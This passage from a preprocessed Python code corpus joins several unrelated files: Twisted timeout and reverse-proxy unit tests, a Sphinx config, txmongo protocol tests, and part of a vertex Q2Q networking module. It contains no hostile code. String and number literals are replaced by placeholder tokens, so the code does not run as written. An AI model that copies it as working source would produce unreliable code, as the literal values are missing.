) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertTrue ( result . wasSuccessful ( ) , result . errors ) <EOL> class TimeoutTests ( TestTester ) : <EOL> def getTest ( self , name ) : <EOL> return detests . TimeoutTests ( name ) <EOL> def _wasTimeout ( self , error ) : <EOL> self . assertEqual ( error . check ( defer . TimeoutError ) , <EOL> defer . TimeoutError ) <EOL> def test_pass ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> def test_passDefault ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> def test_timeout ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . 
errors ) , <NUM_LIT:1> ) <EOL> self . _wasTimeout ( result . errors [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> def test_timeoutZero ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> self . _wasTimeout ( result . errors [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> def test_skip ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . skips ) , <NUM_LIT:1> ) <EOL> def test_todo ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . expectedFailures ) , <NUM_LIT:1> ) <EOL> self . _wasTimeout ( result . expectedFailures [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> def test_errorPropagation ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . _wasTimeout ( detests . TimeoutTests . timedOut ) <EOL> def test_classTimeout ( self ) : <EOL> loader = pyunit . TestLoader ( ) <EOL> suite = loader . loadTestsFromTestCase ( detests . TestClassTimeoutAttribute ) <EOL> result = reporter . TestResult ( ) <EOL> suite . run ( result ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> self . _wasTimeout ( result . errors [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> def test_callbackReturnsNonCallingDeferred ( self ) : <EOL> from twisted . internet import reactor <EOL> call = reactor . callLater ( <NUM_LIT:2> , reactor . crash ) <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> if call . active ( ) : <EOL> call . cancel ( ) <EOL> self . 
assertFalse ( result . wasSuccessful ( ) ) <EOL> self . _wasTimeout ( result . errors [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> del TestTester </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , division <EOL> from twisted . web import static <EOL> class Test ( static . Data ) : <EOL> isLeaf = True <EOL> def __init__ ( self ) : <EOL> static . Data . __init__ ( <EOL> self , <EOL> b"""<STR_LIT>""" , <EOL> "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from twisted . trial . unittest import TestCase <EOL> from twisted . test . proto_helpers import StringTransportWithDisconnection <EOL> from twisted . test . proto_helpers import MemoryReactor <EOL> from twisted . web . resource import Resource <EOL> from twisted . web . server import Site <EOL> from twisted . web . proxy import ReverseProxyResource , ProxyClientFactory <EOL> from twisted . web . proxy import ProxyClient , ProxyRequest , ReverseProxyRequest <EOL> from twisted . web . test . test_web import DummyRequest <EOL> class ReverseProxyResourceTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def _testRender ( self , uri , expectedURI ) : <EOL> """<STR_LIT>""" <EOL> root = Resource ( ) <EOL> reactor = MemoryReactor ( ) <EOL> resource = ReverseProxyResource ( u"<STR_LIT:127.0.0.1>" , <NUM_LIT> , b"<STR_LIT>" , reactor ) <EOL> root . putChild ( b'<STR_LIT:index>' , resource ) <EOL> site = Site ( root ) <EOL> transport = StringTransportWithDisconnection ( ) <EOL> channel = site . buildProtocol ( None ) <EOL> channel . makeConnection ( transport ) <EOL> self . addCleanup ( channel . connectionLost , None ) <EOL> channel . dataReceived ( b"<STR_LIT>" + <EOL> uri + <EOL> b"<STR_LIT>" ) <EOL> self . assertEqual ( len ( reactor . tcpClients ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , u"<STR_LIT:127.0.0.1>" ) <EOL> self . assertEqual ( reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <NUM_LIT> ) <EOL> factory = reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] <EOL> self . assertIsInstance ( factory , ProxyClientFactory ) <EOL> self . assertEqual ( factory . rest , expectedURI ) <EOL> self . assertEqual ( factory . headers [ b"<STR_LIT:host>" ] , b"<STR_LIT>" ) <EOL> def test_render ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _testRender ( b"<STR_LIT>" , b"<STR_LIT>" ) <EOL> def test_renderWithQuery ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . 
_testRender ( b"<STR_LIT>" , b"<STR_LIT>" ) <EOL> def test_getChild ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = MemoryReactor ( ) <EOL> resource = ReverseProxyResource ( u"<STR_LIT:127.0.0.1>" , <NUM_LIT> , b"<STR_LIT>" , reactor ) <EOL> child = resource . getChild ( b'<STR_LIT:foo>' , None ) <EOL> self . assertIsInstance ( child , ReverseProxyResource ) <EOL> self . assertEqual ( child . path , b"<STR_LIT>" ) <EOL> self . assertEqual ( child . port , <NUM_LIT> ) <EOL> self . assertEqual ( child . host , u"<STR_LIT:127.0.0.1>" ) <EOL> self . assertIdentical ( child . reactor , resource . reactor ) <EOL> def test_getChildWithSpecial ( self ) : <EOL> """<STR_LIT>""" <EOL> resource = ReverseProxyResource ( u"<STR_LIT:127.0.0.1>" , <NUM_LIT> , b"<STR_LIT>" ) <EOL> child = resource . getChild ( b'<STR_LIT>' , None ) <EOL> self . assertEqual ( child . path , b"<STR_LIT>" ) <EOL> class DummyChannel ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , transport ) : <EOL> """<STR_LIT>""" <EOL> self . transport = transport <EOL> self . lostReason = None <EOL> def connectionLost ( self , reason ) : <EOL> """<STR_LIT>""" <EOL> self . lostReason = reason <EOL> class ProxyClientTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def _parseOutHeaders ( self , content ) : <EOL> """<STR_LIT>""" <EOL> headers , body = content . split ( b'<STR_LIT>' ) <EOL> headers = headers . split ( b'<STR_LIT:\r\n>' ) <EOL> requestLine = headers . pop ( <NUM_LIT:0> ) <EOL> return ( <EOL> requestLine , dict ( header . split ( b'<STR_LIT>' ) for header in headers ) , body ) <EOL> def makeRequest ( self , path ) : <EOL> """<STR_LIT>""" <EOL> return DummyRequest ( path ) <EOL> def makeProxyClient ( self , request , method = b"<STR_LIT:GET>" , headers = None , <EOL> requestBody = b"<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> if headers is None : <EOL> headers = { b"<STR_LIT>" : b"<STR_LIT>" } <EOL> path = b'<STR_LIT:/>' + request . 
postpath <EOL> return ProxyClient ( <EOL> method , path , b'<STR_LIT>' , headers , requestBody , request ) <EOL> def connectProxy ( self , proxyClient ) : <EOL> """<STR_LIT>""" <EOL> clientTransport = StringTransportWithDisconnection ( ) <EOL> clientTransport . protocol = proxyClient <EOL> proxyClient . makeConnection ( clientTransport ) <EOL> return clientTransport <EOL> def assertForwardsHeaders ( self , proxyClient , requestLine , headers ) : <EOL> """<STR_LIT>""" <EOL> self . connectProxy ( proxyClient ) <EOL> requestContent = proxyClient . transport . value ( ) <EOL> receivedLine , receivedHeaders , body = self . _parseOutHeaders ( <EOL> requestContent ) <EOL> self . assertEqual ( receivedLine , requestLine ) <EOL> self . assertEqual ( receivedHeaders , headers ) <EOL> return body <EOL> def makeResponseBytes ( self , code , message , headers , body ) : <EOL> lines = [ b"<STR_LIT>" + str ( code ) . encode ( '<STR_LIT:ascii>' ) + b'<STR_LIT:U+0020>' + message ] <EOL> for header , values in headers : <EOL> for value in values : <EOL> lines . append ( header + b'<STR_LIT>' + value ) <EOL> lines . extend ( [ b'<STR_LIT>' , body ] ) <EOL> return b'<STR_LIT:\r\n>' . join ( lines ) <EOL> def assertForwardsResponse ( self , request , code , message , headers , body ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( request . responseCode , code ) <EOL> self . assertEqual ( request . responseMessage , message ) <EOL> receivedHeaders = list ( request . responseHeaders . getAllRawHeaders ( ) ) <EOL> receivedHeaders . sort ( ) <EOL> expectedHeaders = headers [ : ] <EOL> expectedHeaders . sort ( ) <EOL> self . assertEqual ( receivedHeaders , expectedHeaders ) <EOL> self . assertEqual ( b'<STR_LIT>' . join ( request . written ) , body ) <EOL> def _testDataForward ( self , code , message , headers , body , method = b"<STR_LIT:GET>" , <EOL> requestBody = b"<STR_LIT>" , loseConnection = True ) : <EOL> """<STR_LIT>""" <EOL> request = self . 
makeRequest ( b'<STR_LIT:foo>' ) <EOL> client = self . makeProxyClient ( <EOL> request , method , { b'<STR_LIT>' : b'<STR_LIT>' } , requestBody ) <EOL> receivedBody = self . assertForwardsHeaders ( <EOL> client , method + b'<STR_LIT>' , <EOL> { b'<STR_LIT>' : b'<STR_LIT>' , b'<STR_LIT>' : b'<STR_LIT>' } ) <EOL> self . assertEqual ( receivedBody , requestBody ) <EOL> client . dataReceived ( <EOL> self . makeResponseBytes ( code , message , headers , body ) ) <EOL> self . assertForwardsResponse ( request , code , message , headers , body ) <EOL> if loseConnection : <EOL> client . transport . loseConnection ( ) <EOL> self . assertFalse ( client . transport . connected ) <EOL> self . assertEqual ( request . finished , <NUM_LIT:1> ) <EOL> def test_forward ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _testDataForward ( <EOL> <NUM_LIT:200> , b"<STR_LIT:OK>" , [ ( b"<STR_LIT>" , [ b"<STR_LIT:bar>" , b"<STR_LIT>" ] ) ] , b"<STR_LIT>" ) <EOL> def test_postData ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _testDataForward ( <EOL> <NUM_LIT:200> , b"<STR_LIT:OK>" , [ ( b"<STR_LIT>" , [ b"<STR_LIT:bar>" ] ) ] , b"<STR_LIT>" , b"<STR_LIT:POST>" , b"<STR_LIT>" ) <EOL> def test_statusWithMessage ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _testDataForward ( <EOL> <NUM_LIT> , b"<STR_LIT>" , [ ] , b"<STR_LIT>" ) <EOL> def test_contentLength ( self ) : <EOL> """<STR_LIT>""" <EOL> data = b"<STR_LIT>" <EOL> return self . _testDataForward ( <EOL> <NUM_LIT:200> , <EOL> b"<STR_LIT:OK>" , <EOL> [ ( b"<STR_LIT>" , [ str ( len ( data ) ) . encode ( '<STR_LIT:ascii>' ) ] ) ] , <EOL> data ) <EOL> def test_losesConnection ( self ) : <EOL> """<STR_LIT>""" <EOL> data = b"<STR_LIT>" <EOL> return self . _testDataForward ( <EOL> <NUM_LIT:200> , <EOL> b"<STR_LIT:OK>" , <EOL> [ ( b"<STR_LIT>" , [ str ( len ( data ) ) . 
encode ( '<STR_LIT:ascii>' ) ] ) ] , <EOL> data , <EOL> loseConnection = False ) <EOL> def test_headersCleanups ( self ) : <EOL> """<STR_LIT>""" <EOL> client = ProxyClient ( b'<STR_LIT:GET>' , b'<STR_LIT>' , b'<STR_LIT>' , <EOL> { b"<STR_LIT>" : b"<STR_LIT>" , b"<STR_LIT>" : b"<STR_LIT:foo>" } , b'<STR_LIT>' , None ) <EOL> self . assertEqual ( client . headers , <EOL> { b"<STR_LIT>" : b"<STR_LIT>" , b"<STR_LIT>" : b"<STR_LIT>" } ) <EOL> def test_keepaliveNotForwarded ( self ) : <EOL> """<STR_LIT>""" <EOL> headers = { <EOL> b"<STR_LIT>" : b"<STR_LIT>" , <EOL> b'<STR_LIT>' : b'<STR_LIT>' , <EOL> b'<STR_LIT>' : b'<STR_LIT>' , <EOL> } <EOL> expectedHeaders = headers . copy ( ) <EOL> expectedHeaders [ b'<STR_LIT>' ] = b'<STR_LIT>' <EOL> del expectedHeaders [ b'<STR_LIT>' ] <EOL> client = ProxyClient ( b'<STR_LIT:GET>' , b'<STR_LIT>' , b'<STR_LIT>' , headers , b'<STR_LIT>' , None ) <EOL> self . assertForwardsHeaders ( <EOL> client , b'<STR_LIT>' , expectedHeaders ) <EOL> def test_defaultHeadersOverridden ( self ) : <EOL> """<STR_LIT>""" <EOL> request = self . makeRequest ( b'<STR_LIT:foo>' ) <EOL> request . responseHeaders . setRawHeaders ( b'<STR_LIT>' , [ b'<STR_LIT>' ] ) <EOL> request . responseHeaders . setRawHeaders ( b'<STR_LIT:date>' , [ b'<STR_LIT>' ] ) <EOL> request . responseHeaders . setRawHeaders ( b'<STR_LIT>' , [ b"<STR_LIT>" ] ) <EOL> client = self . makeProxyClient ( request , headers = { b'<STR_LIT>' : b'<STR_LIT>' } ) <EOL> self . connectProxy ( client ) <EOL> headers = { <EOL> b'<STR_LIT>' : [ b'<STR_LIT:bar>' ] , <EOL> b'<STR_LIT>' : [ b'<STR_LIT>' ] , <EOL> b'<STR_LIT:Content-Type>' : [ b'<STR_LIT>' ] , <EOL> } <EOL> client . dataReceived ( <EOL> self . makeResponseBytes ( <NUM_LIT:200> , b"<STR_LIT:OK>" , headers . items ( ) , b'<STR_LIT>' ) ) <EOL> self . assertForwardsResponse ( <EOL> request , <NUM_LIT:200> , b'<STR_LIT:OK>' , list ( headers . 
items ( ) ) , b'<STR_LIT>' ) <EOL> class ProxyClientFactoryTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_connectionFailed ( self ) : <EOL> """<STR_LIT>""" <EOL> request = DummyRequest ( [ b'<STR_LIT:foo>' ] ) <EOL> factory = ProxyClientFactory ( b'<STR_LIT:GET>' , b'<STR_LIT>' , b'<STR_LIT>' , <EOL> { b"<STR_LIT>" : b"<STR_LIT>" } , '<STR_LIT>' , request ) <EOL> factory . clientConnectionFailed ( None , None ) <EOL> self . assertEqual ( request . responseCode , <NUM_LIT> ) <EOL> self . assertEqual ( request . responseMessage , b"<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> list ( request . responseHeaders . getAllRawHeaders ( ) ) , <EOL> [ ( b"<STR_LIT:Content-Type>" , [ b"<STR_LIT>" ] ) ] ) <EOL> self . assertEqual ( <EOL> b'<STR_LIT>' . join ( request . written ) , <EOL> b"<STR_LIT>" ) <EOL> self . assertEqual ( request . finished , <NUM_LIT:1> ) <EOL> def test_buildProtocol ( self ) : <EOL> """<STR_LIT>""" <EOL> factory = ProxyClientFactory ( b'<STR_LIT:GET>' , b'<STR_LIT>' , b'<STR_LIT>' , <EOL> { b"<STR_LIT>" : b"<STR_LIT>" } , b'<STR_LIT>' , <EOL> None ) <EOL> proto = factory . buildProtocol ( None ) <EOL> self . assertIsInstance ( proto , ProxyClient ) <EOL> self . assertEqual ( proto . command , b'<STR_LIT:GET>' ) <EOL> self . assertEqual ( proto . rest , b'<STR_LIT>' ) <EOL> self . assertEqual ( proto . data , b'<STR_LIT>' ) <EOL> self . assertEqual ( proto . headers , <EOL> { b"<STR_LIT>" : b"<STR_LIT>" , b"<STR_LIT>" : b"<STR_LIT>" } ) <EOL> class ProxyRequestTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def _testProcess ( self , uri , expectedURI , method = b"<STR_LIT:GET>" , data = b"<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> transport = StringTransportWithDisconnection ( ) <EOL> channel = DummyChannel ( transport ) <EOL> reactor = MemoryReactor ( ) <EOL> request = ProxyRequest ( channel , False , reactor ) <EOL> request . gotLength ( len ( data ) ) <EOL> request . handleContentChunk ( data ) <EOL> request . 
requestReceived ( method , b'<STR_LIT>' + uri , <EOL> b'<STR_LIT>' ) <EOL> self . assertEqual ( len ( reactor . tcpClients ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , u"<STR_LIT>" ) <EOL> self . assertEqual ( reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <NUM_LIT> ) <EOL> factory = reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] <EOL> self . assertIsInstance ( factory , ProxyClientFactory ) <EOL> self . assertEqual ( factory . command , method ) <EOL> self . assertEqual ( factory . version , b'<STR_LIT>' ) <EOL> self . assertEqual ( factory . headers , { b'<STR_LIT:host>' : b'<STR_LIT>' } ) <EOL> self . assertEqual ( factory . data , data ) <EOL> self . assertEqual ( factory . rest , expectedURI ) <EOL> self . assertEqual ( factory . father , request ) <EOL> def test_process ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _testProcess ( b"<STR_LIT>" , b"<STR_LIT>" ) <EOL> def test_processWithoutTrailingSlash ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _testProcess ( b"<STR_LIT>" , b"<STR_LIT:/>" ) <EOL> def test_processWithData ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _testProcess ( <EOL> b"<STR_LIT>" , b"<STR_LIT>" , b"<STR_LIT:POST>" , b"<STR_LIT>" ) <EOL> def test_processWithPort ( self ) : <EOL> """<STR_LIT>""" <EOL> transport = StringTransportWithDisconnection ( ) <EOL> channel = DummyChannel ( transport ) <EOL> reactor = MemoryReactor ( ) <EOL> request = ProxyRequest ( channel , False , reactor ) <EOL> request . gotLength ( <NUM_LIT:0> ) <EOL> request . requestReceived ( b'<STR_LIT:GET>' , b'<STR_LIT>' , <EOL> b'<STR_LIT>' ) <EOL> self . assertEqual ( len ( reactor . tcpClients ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , u"<STR_LIT>" ) <EOL> self . assertEqual ( reactor . 
tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <NUM_LIT> ) <EOL> class DummyFactory ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , port ) : <EOL> self . host = host <EOL> self . port = port <EOL> class ReverseProxyRequestTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_process ( self ) : <EOL> """<STR_LIT>""" <EOL> transport = StringTransportWithDisconnection ( ) <EOL> channel = DummyChannel ( transport ) <EOL> reactor = MemoryReactor ( ) <EOL> request = ReverseProxyRequest ( channel , False , reactor ) <EOL> request . factory = DummyFactory ( u"<STR_LIT>" , <NUM_LIT> ) <EOL> request . gotLength ( <NUM_LIT:0> ) <EOL> request . requestReceived ( b'<STR_LIT:GET>' , b'<STR_LIT>' , b'<STR_LIT>' ) <EOL> self . assertEqual ( len ( reactor . tcpClients ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , u"<STR_LIT>" ) <EOL> self . assertEqual ( reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <NUM_LIT> ) <EOL> factory = reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] <EOL> self . assertIsInstance ( factory , ProxyClientFactory ) <EOL> self . assertEqual ( factory . headers , { b'<STR_LIT:host>' : b'<STR_LIT>' } ) </s>
<s> import sys <EOL> import os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = version <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> from __future__ import absolute_import , division <EOL> from bson import BSON <EOL> from twisted . trial import unittest <EOL> from twisted . python . compat import unicode <EOL> from txmongo . protocol import MongoClientProtocol , MongoDecoder , Insert , Query , KillCursors , Getmore , Update , Delete , UPDATE_MULTI , UPDATE_UPSERT , DELETE_SINGLE_REMOVE <EOL> class _FakeTransport ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . data = [ ] <EOL> def write ( self , data ) : <EOL> self . data . append ( data ) <EOL> def get_content ( self ) : <EOL> return b'<STR_LIT>' . join ( self . data ) <EOL> class TestMongoProtocol ( unittest . TestCase ) : <EOL> def __test_encode_decode ( self , request ) : <EOL> proto = MongoClientProtocol ( ) <EOL> proto . transport = _FakeTransport ( ) <EOL> proto . send ( request ) <EOL> decoder = MongoDecoder ( ) <EOL> decoder . feed ( proto . transport . get_content ( ) ) <EOL> decoded = next ( decoder ) <EOL> for field , dec_value , req_value in zip ( request . _fields , decoded , request ) : <EOL> if field not in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> if isinstance ( dec_value , bytes ) and isinstance ( req_value , unicode ) : <EOL> dec_value = dec_value . decode ( ) <EOL> self . assertEqual ( dec_value , req_value ) <EOL> def test_EncodeDecodeQuery ( self ) : <EOL> request = Query ( collection = "<STR_LIT>" , n_to_skip = <NUM_LIT> , n_to_return = <NUM_LIT> , <EOL> query = BSON . encode ( { '<STR_LIT:x>' : <NUM_LIT> } ) , <EOL> fields = BSON . encode ( { '<STR_LIT:y>' : <NUM_LIT:1> } ) ) <EOL> self . __test_encode_decode ( request ) <EOL> def test_EncodeDecodeKillCursors ( self ) : <EOL> request = KillCursors ( cursors = [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> self . __test_encode_decode ( request ) <EOL> def test_EncodeDecodeGetmore ( self ) : <EOL> request = Getmore ( collection = "<STR_LIT>" , cursor_id = <NUM_LIT> , n_to_return = <NUM_LIT:5> ) <EOL> self . 
__test_encode_decode ( request ) <EOL> def test_EncodeDecodeInsert ( self ) : <EOL> request = Insert ( collection = "<STR_LIT>" , documents = [ BSON . encode ( { '<STR_LIT:x>' : <NUM_LIT> } ) ] ) <EOL> self . __test_encode_decode ( request ) <EOL> def test_EncodeDecodeUpdate ( self ) : <EOL> request = Update ( flags = UPDATE_MULTI | UPDATE_UPSERT , collection = "<STR_LIT>" , <EOL> selector = BSON . encode ( { '<STR_LIT:x>' : <NUM_LIT> } ) , <EOL> update = BSON . encode ( { "<STR_LIT>" : { '<STR_LIT:y>' : <NUM_LIT> } } ) ) <EOL> self . __test_encode_decode ( request ) <EOL> def test_EncodeDecodeDelete ( self ) : <EOL> request = Delete ( flags = DELETE_SINGLE_REMOVE , collection = "<STR_LIT>" , <EOL> selector = BSON . encode ( { '<STR_LIT:x>' : <NUM_LIT> } ) ) <EOL> self . __test_encode_decode ( request ) </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> from hashlib import md5 <EOL> import struct <EOL> import datetime <EOL> import time <EOL> from collections import namedtuple <EOL> from pprint import pformat <EOL> from zope . interface import implements <EOL> from twisted . internet import reactor , defer , interfaces , protocol , error <EOL> from twisted . internet . main import CONNECTION_DONE <EOL> from twisted . internet . ssl import ( <EOL> CertificateRequest , Certificate , PrivateCertificate , KeyPair , <EOL> DistinguishedName ) <EOL> from twisted . python import log <EOL> from twisted . python . failure import Failure <EOL> from twisted . application import service <EOL> from twisted . cred . checkers import ICredentialsChecker <EOL> from twisted . cred . portal import IRealm , Portal <EOL> from twisted . cred . credentials import IUsernamePassword , UsernamePassword <EOL> from twisted . cred . error import UnauthorizedLogin <EOL> from twisted . protocols . amp import Argument , Boolean , Integer , String , Unicode , ListOf , AmpList <EOL> from twisted . protocols . amp import AmpBox , Command , StartTLS , ProtocolSwitchCommand , AMP <EOL> from twisted . protocols . amp import _objectsToStrings <EOL> from vertex import subproducer , ptcp <EOL> from vertex import endpoint , ivertex <EOL> from vertex . conncache import ConnectionCache <EOL> port = <NUM_LIT> <EOL> class ConnectionError ( Exception ) : <EOL> pass <EOL> class AttemptsFailed ( ConnectionError ) : <EOL> pass <EOL> class NoAttemptsMade ( ConnectionError ) : <EOL> pass <EOL> class VerifyError ( Exception ) : <EOL> pass <EOL> class BadCertificateRequest ( VerifyError ) : <EOL> pass <EOL> class IgnoreConnectionFailed ( protocol . ClientFactory ) : <EOL> def __init__ ( self , realFactory ) : <EOL> self . realFactory = realFactory <EOL> def clientConnectionLost ( self , connector , reason ) : <EOL> self . realFactory . 
clientConnectionLost ( connector , reason ) <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> pass <EOL> def buildProtocol ( self , addr ) : <EOL> return self . realFactory . buildProtocol ( addr ) <EOL> class Q2QAddress ( object ) : <EOL> def __init__ ( self , domain , resource = None ) : <EOL> self . resource = resource <EOL> self . domain = domain <EOL> def domainAddress ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . resource is None : <EOL> return self <EOL> else : <EOL> return Q2QAddress ( self . domain ) <EOL> def claimedAsIssuerOf ( self , cert ) : <EOL> """<STR_LIT>""" <EOL> return cert . getIssuer ( ) . commonName == str ( self ) <EOL> def claimedAsSubjectOf ( self , cert ) : <EOL> """<STR_LIT>""" <EOL> return cert . getSubject ( ) . commonName == str ( self ) <EOL> def __cmp__ ( self , other ) : <EOL> if not isinstance ( other , Q2QAddress ) : <EOL> return cmp ( self . __class__ , other . __class__ ) <EOL> return cmp ( ( self . domain , self . resource ) , ( other . domain , other . resource ) ) <EOL> def __iter__ ( self ) : <EOL> return iter ( ( self . resource , self . domain ) ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . resource : <EOL> resource = self . resource + '<STR_LIT:@>' <EOL> else : <EOL> resource = '<STR_LIT>' <EOL> return ( resource + self . domain ) . encode ( '<STR_LIT:utf-8>' ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . __str__ ( ) <EOL> def __hash__ ( self ) : <EOL> return hash ( str ( self ) ) <EOL> def fromString ( cls , string ) : <EOL> args = string . split ( "<STR_LIT:@>" , <NUM_LIT:1> ) <EOL> args . reverse ( ) <EOL> return cls ( * args ) <EOL> fromString = classmethod ( fromString ) <EOL> class VirtualTransportAddress : <EOL> def __init__ ( self , underlying ) : <EOL> self . underlying = underlying <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . 
underlying , ) <EOL> class Q2QTransportAddress : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , underlying , logical , protocol ) : <EOL> self . underlying = underlying <EOL> self . logical = logical <EOL> self . protocol = protocol <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . underlying , <EOL> self . logical , <EOL> self . protocol ) <EOL> class AmpTime ( Argument ) : <EOL> def toString ( self , inObject ) : <EOL> return inObject . strftime ( "<STR_LIT>" ) <EOL> def fromString ( self , inString ) : <EOL> return datetime . datetime . strptime ( inString , "<STR_LIT>" ) <EOL> class Q2QAddressArgument ( Argument ) : <EOL> fromString = Q2QAddress . fromString <EOL> toString = Q2QAddress . __str__ <EOL> class HostPort ( Argument ) : <EOL> def toString ( self , inObj ) : <EOL> return "<STR_LIT>" % tuple ( inObj ) <EOL> def fromString ( self , inStr ) : <EOL> host , sPort = inStr . split ( "<STR_LIT::>" ) <EOL> return ( host , int ( sPort ) ) <EOL> class _BinaryLoadable ( String ) : <EOL> def toString ( self , arg ) : <EOL> assert isinstance ( arg , self . loader ) , "<STR_LIT>" % ( arg , self . loader ) <EOL> return String . toString ( self , arg . dump ( ) ) <EOL> def fromString ( self , arg ) : <EOL> return self . loader . load ( String . fromString ( self , arg ) ) <EOL> class CertReq ( _BinaryLoadable ) : <EOL> loader = CertificateRequest <EOL> class Cert ( _BinaryLoadable ) : <EOL> loader = Certificate <EOL> from twisted . internet import protocol <EOL> class Q2QClientProtocolFactoryWrapper : <EOL> def __init__ ( self , service , cpf , fromAddress , toAddress , protocolName , <EOL> connectionEstablishedDeferred ) : <EOL> self . service = service <EOL> self . cpf = cpf <EOL> self . fromAddress = fromAddress <EOL> self . 